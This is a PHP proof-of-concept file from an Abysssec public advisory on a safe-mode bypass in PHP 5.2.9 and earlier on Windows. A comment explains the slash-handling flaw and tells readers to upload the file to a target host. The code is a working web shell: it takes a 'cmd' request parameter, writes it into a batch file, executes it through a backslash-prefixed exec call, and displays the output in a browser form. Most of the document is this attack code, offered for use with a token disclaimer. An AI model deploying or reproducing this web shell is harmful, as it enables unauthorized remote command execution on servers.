<?php//cmd.php/*Abysssec Inc Public AdvisoryHere is another safemod bypass vulnerability exist in php <= 5.2.9 on windows .the problem comes from OS behavior - implement and interfacing between phpand operation systems directory structure . the problem is php won't tell differencebetween directory browsing in linux and windows this can lead attacker to abilityexecute his / her commands on targert machie even in SafeMod On (php.ini setting) .=============================================================================in linux when you want open a directory for example php directory you needto go to /usr/bin/php and you can't use \usr\bin\php . but windows won't telldiffence between slash and back slash it means there is no didffrence betweenc:\php and c:/php , and this is not vulnerability but itself but because of this simplephp implement "\" character can escape safemode using function like excec .here is a PoC for discussed vulnerability . just upload files on your target host and executeyour commands .==============================================================================note : this vulnerabities is just for educational purpose and author will be not be responsiblefor any damage using this vulnerabilty.==============================================================================for more information visit Abysssec.comfeel free to contact me at admin [at] abysssec.com*/$cmd = $_REQUEST['cmd'];if ($cmd){$batch =fopen ("cmd.bat","w");fwrite($batch,"$cmd>abysssec.txt"."\r\n");fwrite($batch,"exit");fclose($batch);exec("\start cmd.bat");echo"<center>";echo"<h1>Abysssec.com PHP <= 5.2.9 SafeMod Bypasser</h1>";echo"<textarea rows=20 cols=60>";require("abysssec.txt");echo"</textarea>";echo"</center>";}?><html><body bgcolor=#000000 and text=#DO0000><center><form method=post><input type=text name=cmd ><input type=submit value=bypass></form></center></body></html>
